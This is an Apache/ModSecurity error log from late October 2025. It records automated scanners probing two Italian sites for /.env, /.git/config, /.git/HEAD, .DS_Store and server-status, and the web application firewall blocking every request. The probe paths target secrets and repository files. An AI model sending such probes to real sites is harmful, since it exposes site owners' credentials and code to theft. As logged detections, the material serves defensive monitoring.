[Fri Oct 24 15:33:00.110063 2025] [:error] [pid 3722556] [client 159.89.174.87:36418] [client 159.89.174.87] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPuADI4wJNhUhIt3vUHc5AAAAB0"]
[Fri Oct 24 15:33:00.110277 2025] [:error] [pid 3722556] [client 159.89.174.87:36418] [client 159.89.174.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPuADI4wJNhUhIt3vUHc5AAAAB0"]
[Fri Oct 24 15:33:00.110491 2025] [:error] [pid 3722556] [client 159.89.174.87:36418] [client 159.89.174.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aPuADI4wJNhUhIt3vUHc5AAAAB0"]
[Fri Oct 24 15:33:00.547467 2025] [:error] [pid 3728426] [client 159.89.174.87:36432] [client 159.89.174.87] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPuADCWJ1CPdovV5xzXIzAAAAA0"]
[Fri Oct 24 15:33:00.547678 2025] [:error] [pid 3728426] [client 159.89.174.87:36432] [client 159.89.174.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPuADCWJ1CPdovV5xzXIzAAAAA0"]
[Fri Oct 24 15:33:00.547850 2025] [:error] [pid 3728426] [client 159.89.174.87:36432] [client 159.89.174.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aPuADCWJ1CPdovV5xzXIzAAAAA0"]
[Fri Oct 24 19:14:42.568287 2025] [authz_core:error] [pid 3730601] [client 138.197.191.87:52760] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Oct 24 19:14:42.994329 2025] [:error] [pid 3730598] [client 138.197.191.87:52778] [client 138.197.191.87] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aPu0AlsPW3WaR1ugPv3LDwAAAAU"]
[Fri Oct 24 19:14:42.994558 2025] [:error] [pid 3730598] [client 138.197.191.87:52778] [client 138.197.191.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aPu0AlsPW3WaR1ugPv3LDwAAAAU"]
[Fri Oct 24 19:14:42.994720 2025] [:error] [pid 3730598] [client 138.197.191.87:52778] [client 138.197.191.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aPu0AlsPW3WaR1ugPv3LDwAAAAU"]
[Fri Oct 24 19:14:43.071759 2025] [:error] [pid 3730598] [client 138.197.191.87:52794] [client 138.197.191.87] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aPu0A1sPW3WaR1ugPv3LEAAAAAU"]
[Fri Oct 24 19:14:43.071989 2025] [:error] [pid 3730598] [client 138.197.191.87:52794] [client 138.197.191.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aPu0A1sPW3WaR1ugPv3LEAAAAAU"]
[Fri Oct 24 19:14:43.072158 2025] [:error] [pid 3730598] [client 138.197.191.87:52794] [client 138.197.191.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aPu0A1sPW3WaR1ugPv3LEAAAAAU"]
[Fri Oct 24 19:14:43.900539 2025] [:error] [pid 3730840] [client 138.197.191.87:52806] [client 138.197.191.87] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPu0A1aI7LYEluAqgcmd5wAAAAA"]
[Fri Oct 24 19:14:43.900745 2025] [:error] [pid 3730840] [client 138.197.191.87:52806] [client 138.197.191.87] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPu0A1aI7LYEluAqgcmd5wAAAAA"]
[Fri Oct 24 19:14:43.900902 2025] [:error] [pid 3730840] [client 138.197.191.87:52806] [client 138.197.191.87] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPu0A1aI7LYEluAqgcmd5wAAAAA"]
[Fri Oct 24 19:14:45.174947 2025] [authz_core:error] [pid 3730601] [client 164.90.208.56:40956] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Oct 24 19:14:45.862201 2025] [:error] [pid 3728426] [client 164.90.208.56:40996] [client 164.90.208.56] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aPu0BSWJ1CPdovV5xzXI3gAAAA0"]
[Fri Oct 24 19:14:45.862428 2025] [:error] [pid 3728426] [client 164.90.208.56:40996] [client 164.90.208.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aPu0BSWJ1CPdovV5xzXI3gAAAA0"]
[Fri Oct 24 19:14:45.862587 2025] [:error] [pid 3728426] [client 164.90.208.56:40996] [client 164.90.208.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aPu0BSWJ1CPdovV5xzXI3gAAAA0"]
[Fri Oct 24 19:14:45.931637 2025] [:error] [pid 3735672] [client 164.90.208.56:41006] [client 164.90.208.56] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aPu0BeJZ4vgAgAbS8ck51wAAAAs"]
[Fri Oct 24 19:14:45.931902 2025] [:error] [pid 3735672] [client 164.90.208.56:41006] [client 164.90.208.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aPu0BeJZ4vgAgAbS8ck51wAAAAs"]
[Fri Oct 24 19:14:45.932079 2025] [:error] [pid 3735672] [client 164.90.208.56:41006] [client 164.90.208.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aPu0BeJZ4vgAgAbS8ck51wAAAAs"]
[Fri Oct 24 19:14:45.992703 2025] [:error] [pid 3735673] [client 164.90.208.56:41008] [client 164.90.208.56] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPu0BSJ2Jnw5SPzdwm__rQAAAAw"]
[Fri Oct 24 19:14:45.992978 2025] [:error] [pid 3735673] [client 164.90.208.56:41008] [client 164.90.208.56] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPu0BSJ2Jnw5SPzdwm__rQAAAAw"]
[Fri Oct 24 19:14:45.993167 2025] [:error] [pid 3735673] [client 164.90.208.56:41008] [client 164.90.208.56] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aPu0BSJ2Jnw5SPzdwm__rQAAAAw"]
[Sat Oct 25 04:54:28.238166 2025] [:error] [pid 3745008] [client 3.140.182.19:39901] [client 3.140.182.19] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aPw75KsnemSQH-EJW718uAAAAAc"]
[Sat Oct 25 04:54:28.238806 2025] [:error] [pid 3745008] [client 3.140.182.19:39901] [client 3.140.182.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aPw75KsnemSQH-EJW718uAAAAAc"]
[Sat Oct 25 04:54:28.239009 2025] [:error] [pid 3745008] [client 3.140.182.19:39901] [client 3.140.182.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aPw75KsnemSQH-EJW718uAAAAAc"]
[Sun Oct 26 08:27:50.672425 2025] [:error] [pid 3770246] [client 45.148.10.165:58168] [client 45.148.10.165] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "aP3NdubSTlD0xztH0qwSuQAAAAY"]
[Sun Oct 26 08:27:50.674160 2025] [:error] [pid 3770246] [client 45.148.10.165:58168] [client 45.148.10.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "aP3NdubSTlD0xztH0qwSuQAAAAY"]
[Sun Oct 26 08:27:50.674295 2025] [:error] [pid 3770246] [client 45.148.10.165:58168] [client 45.148.10.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "aP3NdubSTlD0xztH0qwSuQAAAAY"]
[Sun Oct 26 08:27:50.689667 2025] [:error] [pid 3771488] [client 45.148.10.165:58186] [client 45.148.10.165] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "aP3NdtMg1PqZLeq49VjffwAAAAc"]
[Sun Oct 26 08:27:50.689851 2025] [:error] [pid 3771488] [client 45.148.10.165:58186] [client 45.148.10.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "aP3NdtMg1PqZLeq49VjffwAAAAc"]
[Sun Oct 26 08:27:50.689993 2025] [:error] [pid 3771488] [client 45.148.10.165:58186] [client 45.148.10.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "aP3NdtMg1PqZLeq49VjffwAAAAc"]
[Sun Oct 26 08:27:50.804263 2025] [:error] [pid 3774079] [client 45.148.10.165:58244] [client 45.148.10.165] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aP3NdulpC9eUypebZgUijAAAAAo"]
[Sun Oct 26 08:27:50.804435 2025] [:error] [pid 3774079] [client 45.148.10.165:58244] [client 45.148.10.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aP3NdulpC9eUypebZgUijAAAAAo"]
[Sun Oct 26 08:27:50.804605 2025] [:error] [pid 3774079] [client 45.148.10.165:58244] [client 45.148.10.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aP3NdulpC9eUypebZgUijAAAAAo"]
[Sun Oct 26 08:27:50.835138 2025] [:error] [pid 3769907] [client 45.148.10.165:58264] [client 45.148.10.165] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aP3NdtIjvw9JsGq023h6iwAAAAM"]
[Sun Oct 26 08:27:50.835302 2025] [:error] [pid 3769907] [client 45.148.10.165:58264] [client 45.148.10.165] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aP3NdtIjvw9JsGq023h6iwAAAAM"]
[Sun Oct 26 08:27:50.835446 2025] [:error] [pid 3769907] [client 45.148.10.165:58264] [client 45.148.10.165] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aP3NdtIjvw9JsGq023h6iwAAAAM"]
[Sun Oct 26 14:48:30.062388 2025] [authz_core:error] [pid 3781350] [client 142.93.0.66:44632] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
